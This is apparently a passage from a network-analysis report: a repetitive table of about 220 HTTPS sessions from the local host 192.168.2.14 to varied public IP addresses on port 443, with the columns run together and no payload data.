                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12997192.168.2.144224617.43.155.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12998192.168.2.1440928222.53.180.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12999192.168.2.1450532163.75.59.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13000192.168.2.144579296.238.134.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13001192.168.2.145072640.193.28.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13002192.168.2.1438684209.241.55.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13003192.168.2.143627661.116.137.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13004192.168.2.1440422176.222.31.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13005192.168.2.143659438.21.202.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13006192.168.2.1432786184.206.104.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13007192.168.2.1449896106.199.65.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13008192.168.2.1450070196.153.79.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13009192.168.2.1452612157.56.55.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13010192.168.2.1446246206.21.18.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13011192.168.2.144792643.236.240.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13012192.168.2.143414020.189.31.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13013192.168.2.144346639.193.1.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13014192.168.2.1451272146.139.226.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13015192.168.2.1460686174.255.88.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13016192.168.2.1459968154.8.22.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13017192.168.2.146038296.43.83.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13018192.168.2.144576844.7.31.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13019192.168.2.1436312115.89.69.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13020192.168.2.143772623.227.27.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13021192.168.2.145378276.42.116.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13022192.168.2.1440502157.57.7.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13023192.168.2.146096469.191.38.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13024192.168.2.143772272.31.202.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13025192.168.2.1449320168.176.86.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13026192.168.2.1453812205.80.170.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13027192.168.2.144135452.108.103.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13028192.168.2.145223051.51.122.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13029192.168.2.1451244184.246.245.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13030192.168.2.1440488101.28.29.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13031192.168.2.143715647.60.33.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13032192.168.2.1441504176.70.112.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13033192.168.2.1455520109.213.89.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13034192.168.2.144996450.163.156.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13035192.168.2.143848017.147.18.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13036192.168.2.1444484189.221.79.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13037192.168.2.145248247.109.10.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13038192.168.2.145271250.57.160.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13039192.168.2.145746037.77.104.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13040192.168.2.143624469.171.114.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13041192.168.2.145709836.16.209.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13042192.168.2.1434662101.91.46.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13043192.168.2.1457170222.193.157.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13044192.168.2.1439304134.72.28.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13045192.168.2.1439656135.247.103.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13046192.168.2.1444790113.244.119.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13047192.168.2.1447926210.106.210.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13048192.168.2.145672461.90.52.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13049192.168.2.143770290.130.199.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13050192.168.2.145971471.235.167.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13051192.168.2.1447890220.177.76.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13052192.168.2.1433402148.30.150.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13053192.168.2.1459768133.204.226.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13054192.168.2.1456272101.251.191.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13055192.168.2.1457818198.59.219.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13056192.168.2.1444464162.104.141.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13057192.168.2.1449662159.68.253.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13058192.168.2.145831875.41.35.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13059192.168.2.1444560203.173.223.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13060192.168.2.145181251.96.15.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13061192.168.2.1438608175.168.250.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13062192.168.2.1447978103.5.80.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13063192.168.2.143754094.12.91.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13064192.168.2.1455970117.135.53.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13065192.168.2.143649474.138.25.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13066192.168.2.1436026158.52.205.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13067192.168.2.143705487.91.137.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13068192.168.2.145147823.201.44.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13069192.168.2.1447028170.102.1.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13070192.168.2.1460786134.62.216.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13071192.168.2.1434426170.46.120.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13072192.168.2.143896412.4.77.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13073192.168.2.1447634142.63.226.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13074192.168.2.1453214207.99.77.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13075192.168.2.145341464.172.219.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13076192.168.2.143636819.98.117.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13077192.168.2.1435690135.105.237.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13078192.168.2.1447040185.55.203.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13079192.168.2.144829632.137.64.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13080192.168.2.1436494186.34.83.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13081192.168.2.1438930206.59.93.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13082192.168.2.144673694.31.229.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13083192.168.2.1441642219.223.49.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13084192.168.2.1436030183.204.11.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13085192.168.2.143589837.73.126.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13086192.168.2.1442332166.242.33.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13087192.168.2.1454722187.208.239.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13088192.168.2.145499873.243.32.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13089192.168.2.1438202159.40.22.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13090192.168.2.145257253.46.149.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13091192.168.2.1459334168.75.142.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13092192.168.2.143891212.162.48.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13093192.168.2.14330605.109.83.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13094192.168.2.1438488164.127.131.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13095192.168.2.145624224.34.121.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13096192.168.2.1454814179.2.206.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13097192.168.2.1460022174.192.120.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13098192.168.2.144192019.67.15.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13099192.168.2.1452930161.154.215.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13100192.168.2.1433894137.66.215.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13101192.168.2.1442584131.233.203.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13102192.168.2.1451636104.238.214.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13103192.168.2.145986414.255.60.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13104192.168.2.143752620.131.205.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13105192.168.2.145915644.24.231.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13106192.168.2.144699842.51.200.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13107192.168.2.14563942.55.85.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13108192.168.2.1456868197.137.20.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13109192.168.2.144495425.96.190.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13110192.168.2.144757848.247.254.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13111192.168.2.1438496173.174.150.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13112192.168.2.1459392117.25.150.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13113192.168.2.1460962179.245.187.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13114192.168.2.145014041.65.130.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13115192.168.2.1457452156.212.244.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13116192.168.2.1440718179.240.167.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13117192.168.2.1440546140.67.21.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13118192.168.2.144083223.216.137.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13119192.168.2.1448582209.236.171.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13120192.168.2.1459278168.192.208.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13121192.168.2.1460238103.17.50.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13122192.168.2.1433144156.14.240.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13123192.168.2.1438612123.165.113.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13124192.168.2.1435048209.20.211.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13125192.168.2.1442404179.77.210.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13126192.168.2.145837074.196.54.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13127192.168.2.143892086.20.53.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13128192.168.2.1433764222.251.207.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13129192.168.2.145284070.215.199.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13130192.168.2.145732835.81.249.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13131192.168.2.144182437.44.97.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13132192.168.2.1454670138.183.105.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13133192.168.2.144037847.83.227.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13134192.168.2.1448292130.21.229.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13135192.168.2.1454966114.109.63.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13136192.168.2.1452604160.115.105.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13137192.168.2.1439528176.172.126.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13138192.168.2.1438606183.214.251.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13139192.168.2.143574291.36.174.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13140192.168.2.143681241.170.45.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13141192.168.2.1437750145.186.124.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13142192.168.2.1449658177.141.109.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13143192.168.2.1436154204.74.22.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13144192.168.2.144647086.129.218.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13145192.168.2.145669675.50.18.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13146192.168.2.1457306125.172.173.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13147192.168.2.1457684147.177.145.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13148192.168.2.1460108185.2.7.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13149192.168.2.1432916109.160.126.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13150192.168.2.1437500171.245.145.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13151192.168.2.1435202129.18.86.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13152192.168.2.1443216181.190.247.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13153192.168.2.1434450123.254.107.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13154192.168.2.1453778112.227.132.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13155192.168.2.1441818165.202.164.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13156192.168.2.1450850158.174.34.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13157192.168.2.14508808.226.193.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13158192.168.2.1448142205.48.18.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13159192.168.2.1440336152.89.212.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13160192.168.2.1451982172.9.211.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13161192.168.2.144275631.202.110.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13162192.168.2.1444664170.219.210.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13163192.168.2.144759468.242.111.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13164192.168.2.144786067.204.24.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13165192.168.2.143953218.153.253.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13166192.168.2.14532824.132.165.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13167192.168.2.143651434.147.5.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13168192.168.2.143852681.183.222.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13169192.168.2.14429168.223.145.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13170192.168.2.1443300217.65.177.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13171192.168.2.145591252.178.15.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13172192.168.2.1450744159.109.59.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13173192.168.2.1453946117.240.52.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13174192.168.2.144453658.225.98.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13175192.168.2.143675475.90.208.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13176192.168.2.1453604103.253.95.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13177192.168.2.1452366221.195.70.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13178192.168.2.1436114184.189.64.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13179192.168.2.1446548197.189.57.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13180192.168.2.1443902125.34.18.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13181192.168.2.1455590145.33.146.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13182192.168.2.1434554218.52.250.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13183192.168.2.1458076154.156.166.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13184192.168.2.145281643.210.29.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13185192.168.2.1450532193.11.96.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13186192.168.2.1449144216.18.212.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13187192.168.2.1454480211.164.216.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13188192.168.2.1456084126.41.25.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13189192.168.2.1447006148.15.77.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13190192.168.2.1444206106.185.241.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13191192.168.2.1443434139.44.56.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13192192.168.2.1443146161.148.65.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13193192.168.2.1457264167.5.26.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13194192.168.2.1438038183.225.216.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13195192.168.2.143661814.180.124.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13196192.168.2.1437170102.225.75.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13197192.168.2.144781248.28.88.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13198192.168.2.143936225.75.255.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13199192.168.2.143985813.16.98.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13200192.168.2.1460000199.47.200.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13201192.168.2.14380668.77.185.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13202192.168.2.1448700142.74.77.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13203192.168.2.145856067.213.217.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13204192.168.2.1449590185.56.255.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13205192.168.2.1434918200.80.94.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13206192.168.2.143503894.225.73.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13207192.168.2.1453994200.234.108.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13208192.168.2.1439916195.73.19.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13209192.168.2.1448472218.231.52.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13210192.168.2.1457164178.219.172.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13211192.168.2.144945867.75.99.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13212192.168.2.1444454169.162.141.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13213192.168.2.1439074176.12.183.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13214192.168.2.144544268.34.177.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13215192.168.2.1433634220.192.26.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13216192.168.2.1452408186.247.203.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13217192.168.2.143575883.173.127.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13218192.168.2.1436002120.91.223.23443
